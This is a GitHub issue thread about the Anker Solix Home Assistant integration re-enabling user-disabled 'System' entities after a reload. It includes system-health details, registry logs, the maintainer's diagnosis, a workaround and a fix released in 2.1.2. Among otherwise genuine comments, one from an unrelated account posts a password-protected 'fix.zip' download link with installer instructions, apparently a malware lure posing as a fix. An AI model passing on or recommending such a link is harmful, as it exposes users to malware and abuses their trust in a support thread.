thomluther/ha-anker-solix #114: Cannot disable entities of system device

chkr1011, 2024-08-28:
### System Health details

## System Information

version | core-2024.8.3
-- | --
installation_type | Home Assistant OS
dev | false
hassio | true
docker | true
user | root
virtualenv | false
python_version | 3.12.4
os_name | Linux
os_version | 6.6.31-haos-raspi
arch | aarch64
config_dir | /config

<details><summary>Home Assistant Community Store</summary>

GitHub API | ok
-- | --
GitHub Content | ok
GitHub Web | ok
HACS Data | ok
GitHub API Calls Remaining | 4994
Installed Version | 2.0.0
Stage | running
Available Repositories | 1390
Downloaded Repositories | 10

</details>

<details><summary>Home Assistant Cloud</summary>

logged_in | true
-- | --
subscription_expiration | November 24, 2024 at 01:00
relayer_connected | true
relayer_region | eu-central-1
remote_enabled | true
remote_connected | true
alexa_enabled | true
google_enabled | false
certificate_status | ready
can_reach_cert_server | ok
can_reach_cloud_auth | ok
can_reach_cloud | ok

</details>

<details><summary>Home Assistant Supervisor</summary>

host_os | Home Assistant OS 13.1
-- | --
update_channel | stable
supervisor_version | supervisor-2024.08.0
agent_version | 1.6.0
docker_version | 26.1.4
disk_total | 916.2 GB
disk_used | 9.4 GB
healthy | true
supported | true
host_connectivity | true
supervisor_connectivity | true
ntp_synchronized | true
virtualization | 
board | rpi4-64
supervisor_api | ok
version_api | ok
installed_addons | Studio Code Server (5.15.0), ESPHome (2024.8.1), Terminal & SSH (9.14.0)

</details>

<details><summary>Dashboards</summary>

dashboards | 9
-- | --
resources | 6
views | 30
mode | storage

</details>

<details><summary>Recorder</summary>

oldest_recorder_run | August 26, 2024 at 08:07
-- | --
current_recorder_run | August 26, 2024 at 13:42
estimated_db_size | 515.27 MiB
database_engine | sqlite
database_version | 3.45.3

</details>

### Integration version

2.1.0

### Checklist

- [X] I have enabled debug logging for my installation.
- [X] I have filled out the issue template to the best of my ability.
- [X] This issue only contains 1 issue (if you have multiple issues, open one issue for each issue).
- [X] This issue is not a duplicate issue of any [previous issues](https://github.com/ludeeus/integration_blueprint/issues?q=is%3Aissue+label%3A%22Bug%22+)..

### Describe the issue

Entities which are manually disabled are automatically enabled after some time.

This only affects the "System" device which contains the entities 'CO₂ savings', 'Cost savings' etc.

Entities from the device 'Solarbank 2 E1600 Pro' can be properly disabled and remain disabled.

### Reproduction steps

1. Choose any entity from the 'System' device.
2. Disable it via the entity detail's view.
3. Wait around 15 minutes.
4. See entity details again -> Enabled
...

### Debug logs

```text
-
```

HeinousAgenda38, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

thomluther, 2024-08-29:
Hi @chkr1011 , unfortunately I cannot recreate your issue. And I have no clue why the behavior should be different for device or system sensors, since they are all setup the same way.
An automatic re-activation I can just imagine for the case when your configuration entry is reloaded, e.g. after you changed the options. But even then it is completely handled by core. The integration only defines the initial entity parameters when it is registered the first time. Any subsequent reload would just use the customized entity attributes from the user as stored in your HA registry. So it should Never reactivate automatically, unless you do an upgrade or a reload after a breaking change, which also caused a name change of the entity_id (e.g. this could happen when you switch your HA language since translations are used to composed the entity_id. So anything in HA that is based on entity_id only (not the unique_id which is composed by SNs and fixed keys) may change on configuration entry releoad (Dashboard or automations).
Internally however, the unique_id will be used and restored if it exists already in the registry. So you will not loose history, and all your customized entity changes should be reloaded from the registry.

Hence, I cannot understand how an automatic change of the Active attribute should occur.

chkr1011, 2024-08-29:
Mhh that is strange. I tested a bit more and figured out that I have to "Reload" the integration. Then all entities from the "System" are enabled again. (I tested with CO2 Savings). 

I also captured the following part of the log while reloading the integration.

```log
[custom_components.anker_solix] Finished fetching anker_solix_Chr*** data in 2.791 seconds (success: True)
[custom_components.anker_solix] Removed device entry dca4c8c98720d52dbc9d73fe2c52c53a from registry for device 6388a7cc-7b8b-4c63-a747-58c347aad0c4 due to excluded entities or unused device
[homeassistant.components.binary_sensor] Setting up anker_solix.binary_sensor
[homeassistant.helpers.entity_registry] Registered new binary_sensor.anker_solix entity: binary_sensor.system_garten_system_administration
[homeassistant.helpers.entity_registry] Registered new binary_sensor.anker_solix entity: binary_sensor.system_garten_messages
[homeassistant.components.button] Setting up anker_solix.button
[homeassistant.components.number] Setting up anker_solix.number
[homeassistant.helpers.entity_registry] Registered new number.anker_solix entity: number.system_garten_kwh_price
[homeassistant.components.select] Setting up anker_solix.select
[homeassistant.helpers.entity_registry] Registered new select.anker_solix entity: select.system_garten_price_currency
[homeassistant.components.sensor] Setting up anker_solix.sensor
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_solarbanks
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_power_stations
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_inverter
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_power_panels
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_smart_meters
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_smart_plugs
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_sb_battery_power
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_sb_solar_power
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_sb_home_power
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_sb_state_of_charge
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_sb_data_time
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_co2_savings
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_cost_savings
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_yield_total
[homeassistant.helpers.entity_registry] Registered new sensor.anker_solix entity: sensor.system_garten_system_home_preset
[homeassistant.components.switch] Setting up anker_solix.switch
[homeassistant.helpers.entity_registry] Registered new switch.anker_solix entity: switch.system_garten_api_usage
```

The device _dca4c8c98720d52dbc9d73fe2c52c53a_ is the affected "System" device.

The entities of the "Solarbank 2 E1600 Pro" device are not being registered in the log.

thomluther, 2024-08-29:
Yeah, it seems when a device must be re-registered, the customized enabled property is not reloaded from the registry.
Here is the mechanism:
https://developers.home-assistant.io/docs/entity_registry_disabled_by/

The integration must unregister and re-register devices when option settings require a change in the entities to be provided (like excluded category changes). So when the devices are re-registered, they will fall back to their default disabled setting, which is true per default (unless to set this generally to false for any new entity by the integration).

The interesting question for me is more why your system device is unregistered in the first place if you just reload the entry without configuration change, because then it should not require to unregister any device...

I would need to see a a log with debug enabled for the reload to get an idea why that happens.

thomluther, 2024-08-29:
I think I found the reason why your system is being re-registered on any reload. This is when some categories are excluded that have dependencies on entities assigned to the system. This is the only way to keep the system clean upon exclusions.
So I'm afraid that I cannot change this behavior as far as I can see it now without breaking any other cleanup action upon configuration changes.

chkr1011, 2024-08-29:
So, a workaround would be including all categories and disabling them later on?

thomluther, 2024-08-29:
Yes, for now if no system related categories are excluded, the system will NOT be re-registered again.
That means anything that you disable in the system should remain disabled until you modify anything in the excluded categories again.

chkr1011, 2024-08-29:
I tested it and it works perfectly. If it cannot be solved easily I recommend adding a warning somewhere that this behavior is intended.

Thanks for your quick support.

thomluther, 2024-08-31:
I did an improvement for next release. When devices are registered again, they will be enabled with the default integration settings, which is enabled for all entities except bws_surplus entity. Any user disabled entities will be reactivated based on core design. 
The improvement will now unregister devices only for following:
- Added new exclude category when changing entry options. The affected devices are unregistered since they must be registered again with less entities.
- Confirmed reconfiguration of an integration entry, even if account remains same. This is to ensure changed accounts with less entities don't leave orphaned entities. It is also a fallback option to enforce a new registration of all devices. 
Therefore a simple Reload or HA restart will no longer trigger any device unregistration.

thomluther, 2024-09-22:
Change implemented in release 2.1.2

closed 2024-09-22 by thomluther